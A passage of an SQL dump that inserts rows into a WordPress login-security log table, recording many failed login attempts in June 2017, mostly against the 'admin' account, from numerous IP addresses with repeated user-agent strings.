(101343, 1497670401.221443, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101342, 1497670352.648754, 1, 'loginFailValidUsername', 'admin', 1, 3000776981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101341, 1497670351.529404, 1, 'loginFailValidUsername', 'admin', 1, 3000776981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101340, 1497670087.122697, 1, 'loginFailValidUsername', 'admin', 1, 3319654464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101339, 1497670085.352933, 1, 'loginFailValidUsername', 'admin', 1, 3319654464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101338, 1497664078.909037, 1, 'loginFailValidUsername', 'admin', 1, 995899164, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101337, 1497664077.519015, 1, 'loginFailValidUsername', 'admin', 1, 995899164, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101336, 1497663144.836786, 1, 'loginFailValidUsername', 'admin', 1, 3305257452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101335, 1497663143.819460, 1, 'loginFailValidUsername', 'admin', 1, 3305257452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101334, 1497663116.583273, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101333, 1497663112.564796, 1, 'loginFailValidUsername', 'admin', 1, 3532827868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101332, 1497662926.781664, 1, 'loginFailValidUsername', 'admin', 1, 3358968011, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101331, 1497662925.379254, 1, 'loginFailValidUsername', 'admin', 1, 3358968011, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101330, 1497662623.072451, 1, 'loginFailValidUsername', 'admin', 1, 3032436716, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101329, 1497659507.889427, 1, 'loginFailValidUsername', 'admin', 1, 694709661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101328, 1497659506.470700, 1, 'loginFailValidUsername', 'admin', 1, 694709661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101327, 1497658504.204957, 1, 'loginFailValidUsername', 'admin', 1, 3372672787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101326, 1497658502.528883, 1, 'loginFailValidUsername', 'admin', 1, 3372672787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101325, 1497657067.203366, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101324, 1497656696.080354, 1, 'loginFailValidUsername', 'admin', 1, 1517874559, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101323, 1497656486.753677, 1, 'loginFailValidUsername', 'admin', 1, 3399919026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101322, 1497656484.493833, 1, 'loginFailValidUsername', 'admin', 1, 3399919026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101321, 1497656260.038023, 1, 'loginFailValidUsername', 'admin', 1, 1439252880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101320, 1497654283.727939, 1, 'loginFailValidUsername', 'admin', 1, 2390016979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101319, 1497654282.600555, 1, 'loginFailValidUsername', 'admin', 1, 2390016979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101318, 1497651458.793766, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101317, 1497651320.408650, 1, 'loginFailValidUsername', 'admin', 1, 1742915821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101316, 1497651319.161453, 1, 'loginFailValidUsername', 'admin', 1, 1742915821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101315, 1497651090.812507, 1, 'loginFailValidUsername', 'admin', 1, 1539318777, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101314, 1497651089.789373, 1, 'loginFailValidUsername', 'admin', 1, 1539318777, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101313, 1497648465.757212, 1, 'loginFailValidUsername', 'admin', 1, 1892747498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101312, 1497647740.720158, 1, 'loginFailValidUsername', 'admin', 1, 1976107644, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101311, 1497647738.330519, 1, 'loginFailValidUsername', 'admin', 1, 1976107644, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101310, 1497646941.827389, 1, 'loginFailValidUsername', 'admin', 1, 1568068015, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101309, 1497646940.808524, 1, 'loginFailValidUsername', 'admin', 1, 1568068015, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101308, 1497644335.689581, 1, 'loginFailValidUsername', 'admin', 1, 3373557666, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101307, 1497644326.623379, 1, 'loginFailValidUsername', 'admin', 1, 3373557666, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101306, 1497644065.985831, 1, 'loginFailValidUsername', 'admin', 1, 1391023253, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101305, 1497644065.082084, 1, 'loginFailValidUsername', 'admin', 1, 1391023253, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101304, 1497643675.131851, 1, 'loginFailValidUsername', 'admin', 1, 657483828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101303, 1497643673.555346, 1, 'loginFailValidUsername', 'admin', 1, 657483828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101302, 1497640048.140562, 1, 'loginFailValidUsername', 'admin', 1, 3132885100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101301, 1497640045.002112, 1, 'loginFailValidUsername', 'admin', 1, 3132885100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101300, 1497638425.525701, 1, 'loginFailValidUsername', 'admin', 1, 1416458501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101299, 1497638424.444764, 1, 'loginFailValidUsername', 'admin', 1, 1416458501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101298, 1497637109.148622, 1, 'loginFailValidUsername', 'admin', 1, 778264191, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101297, 1497637108.167585, 1, 'loginFailValidUsername', 'admin', 1, 778264191, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101296, 1497636753.840860, 1, 'loginFailValidUsername', 'admin', 1, 1562720498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101295, 1497636752.865306, 1, 'loginFailValidUsername', 'admin', 1, 1562720498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101294, 1497634230.538174, 1, 'loginFailValidUsername', 'admin', 1, 1333917890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101293, 1497634229.463666, 1, 'loginFailValidUsername', 'admin', 1, 1333917890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101292, 1497633295.703369, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101291, 1497633038.706508, 1, 'loginFailValidUsername', 'admin', 1, 3065501688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101290, 1497633037.008418, 1, 'loginFailValidUsername', 'admin', 1, 3065501688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101289, 1497632322.764317, 1, 'loginFailValidUsername', 'admin', 1, 3389598256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101288, 1497632321.376899, 1, 'loginFailValidUsername', 'admin', 1, 3389598256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101287, 1497629656.828776, 1, 'loginFailValidUsername', 'admin', 1, 762807321, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101286, 1497629655.585200, 1, 'loginFailValidUsername', 'admin', 1, 762807321, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101285, 1497625981.008136, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101284, 1497620115.601845, 1, 'loginFailValidUsername', 'admin', 1, 2660020164, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101283, 1497620114.008868, 1, 'loginFailValidUsername', 'admin', 1, 2660020164, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101282, 1497618067.866352, 1, 'loginFailValidUsername', 'admin', 1, 3111507721, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET4.0C)'),
(101281, 1497617885.440669, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101280, 1497610745.054482, 1, 'loginFailValidUsername', 'admin', 1, 1332036734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101279, 1497610744.087001, 1, 'loginFailValidUsername', 'admin', 1, 1332036734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101278, 1497610649.195363, 1, 'loginFailValidUsername', 'admin', 1, 2192896078, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101277, 1497610219.278669, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101276, 1497602806.844579, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101275, 1497599574.640353, 1, 'loginFailValidUsername', 'admin', 1, 1476942175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101274, 1497595291.622070, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101273, 1497594275.524027, 1, 'loginFailValidUsername', 'admin', 1, 2588096105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101272, 1497594273.695283, 1, 'loginFailValidUsername', 'admin', 1, 2588096105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101271, 1497594006.022743, 1, 'loginFailValidUsername', 'admin', 1, 2083198645, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101270, 1497594004.537238, 1, 'loginFailValidUsername', 'admin', 1, 2083198645, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101269, 1497588652.526115, 1, 'loginFailValidUsername', 'admin', 1, 2054111803, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101268, 1497588650.984761, 1, 'loginFailValidUsername', 'admin', 1, 2054111803, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101267, 1497588364.424451, 1, 'loginFailValidUsername', 'admin', 1, 2050666736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101266, 1497588100.009781, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101265, 1497587221.927679, 1, 'loginFailValidUsername', 'admin', 1, 1416429771, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101264, 1497587220.877607, 1, 'loginFailValidUsername', 'admin', 1, 1416429771, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101263, 1497582986.228470, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.18.61 (KHTML, like Gecko) Version/4.7.2 Safari/533.35'),
(101262, 1497581303.850928, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101261, 1497578872.187043, 1, 'loginFailValidUsername', 'admin', 1, 1768366811, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101260, 1497578870.884191, 1, 'loginFailValidUsername', 'admin', 1, 1768366811, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101259, 1497574414.667611, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101258, 1497572490.482926, 1, 'loginFailValidUsername', 'admin', 1, 1892867061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101257, 1497570680.450906, 1, 'loginFailInvalidUsername', 'vous', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101256, 1497570678.604097, 1, 'loginFailValidUsername', 'pablo', 3, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101255, 1497570676.896491, 1, 'loginFailValidUsername', 'julie', 2, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(101254, 1497570675.204654, 1, 'loginFailInvalidUsername', 'center', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101253, 1497570673.545143, 1, 'loginFailInvalidUsername', 'namur', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101252, 1497570671.848297, 1, 'loginFailInvalidUsername', 'travail', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101251, 1497570670.148879, 1, 'loginFailInvalidUsername', 'professionnel', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101250, 1497570668.469985, 1, 'loginFailInvalidUsername', 'outils', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101249, 1497570666.753461, 1, 'loginFailInvalidUsername', 'venez', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101248, 1497570665.066864, 1, 'loginFailInvalidUsername', 'objectifs', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101247, 1497570069.971094, 1, 'loginFailInvalidUsername', 'cross', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101246, 1497570067.886494, 1, 'loginFailInvalidUsername', 'pour', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101245, 1497570065.782966, 1, 'loginFailInvalidUsername', 'notre', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101244, 1497570063.481352, 1, 'loginFailInvalidUsername', 'training', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101243, 1497570061.385954, 1, 'loginFailInvalidUsername', 'vous', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101242, 1497570059.289804, 1, 'loginFailValidUsername', 'pablo', 3, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101241, 1497570057.208941, 1, 'loginFailValidUsername', 'julie', 2, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101240, 1497570055.082494, 1, 'loginFailInvalidUsername', 'center', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101239, 1497570052.955899, 1, 'loginFailInvalidUsername', 'namur', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101238, 1497570050.858398, 1, 'loginFailInvalidUsername', 'travail', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101237, 1497570048.954826, 1, 'loginFailValidUsername', 'admin', 1, 3583324972, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101236, 1497569315.054321, 1, 'loginFailValidUsername', 'admin', 1, 1730727519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101235, 1497569312.595843, 1, 'loginFailValidUsername', 'admin', 1, 1730727519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101234, 1497568645.021080, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101233, 1497568540.480428, 1, 'loginFailValidUsername', 'admin', 1, 532244500, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; InfoPath.2)'),
(101232, 1497563168.192785, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101231, 1497560317.736809, 1, 'loginFailValidUsername', 'admin', 1, 1602769142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101230, 1497560316.736366, 1, 'loginFailValidUsername', 'admin', 1, 1602769142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101229, 1497557687.252093, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101228, 1497556706.105200, 1, 'loginFailValidUsername', 'admin', 1, 1309966181, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101227, 1497556705.159186, 1, 'loginFailValidUsername', 'admin', 1, 1309966181, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101226, 1497556457.105505, 1, 'loginFailValidUsername', 'admin', 1, 1486676647, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101225, 1497556456.083607, 1, 'loginFailValidUsername', 'admin', 1, 1486676647, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101224, 1497555937.364954, 1, 'loginFailValidUsername', 'admin', 1, 831675222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101223, 1497555935.809061, 1, 'loginFailValidUsername', 'admin', 1, 831675222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101222, 1497555596.888769, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.06.59 (KHTML, like Gecko) Version/5.6.1 Safari/532.13'),
(101221, 1497554020.672054, 1, 'loginFailValidUsername', 'admin', 1, 693797103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101220, 1497554019.418258, 1, 'loginFailValidUsername', 'admin', 1, 693797103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101219, 1497551870.407807, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101218, 1497551181.852648, 1, 'loginFailValidUsername', 'admin', 1, 2996915206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101217, 1497548374.433040, 1, 'loginFailValidUsername', 'admin', 1, 1454326002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101216, 1497548373.191266, 1, 'loginFailValidUsername', 'admin', 1, 1454326002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101215, 1497546880.740171, 1, 'loginFailValidUsername', 'admin', 1, 3631648402, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101214, 1497546873.755714, 1, 'loginFailValidUsername', 'admin', 1, 3631648402, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101213, 1497545930.697698, 1, 'loginFailValidUsername', 'admin', 1, 1837047866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101212, 1497545929.506871, 1, 'loginFailValidUsername', 'admin', 1, 1837047866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101211, 1497545294.982303, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101210, 1497544204.955545, 1, 'loginFailValidUsername', 'admin', 1, 3168543257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101209, 1497544203.277731, 1, 'loginFailValidUsername', 'admin', 1, 3168543257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101208, 1497543771.359007, 1, 'loginFailValidUsername', 'admin', 1, 1833145697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101207, 1497543723.328437, 1, 'loginFailValidUsername', 'admin', 1, 3065291823, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101206, 1497543721.548621, 1, 'loginFailValidUsername', 'admin', 1, 3065291823, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101205, 1497543679.981606, 1, 'loginFailValidUsername', 'admin', 1, 3743340614, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101204, 1497543561.325237, 1, 'loginFailValidUsername', 'admin', 1, 1544579148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101203, 1497543559.925038, 1, 'loginFailValidUsername', 'admin', 1, 1544579148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101202, 1497543272.959772, 1, 'loginFailValidUsername', 'admin', 1, 1310564959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101201, 1497543271.931270, 1, 'loginFailValidUsername', 'admin', 1, 1310564959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101200, 1497537900.040434, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101199, 1497536693.850719, 1, 'loginFailValidUsername', 'admin', 1, 3081917928, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101198, 1497536692.371167, 1, 'loginFailValidUsername', 'admin', 1, 3081917928, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
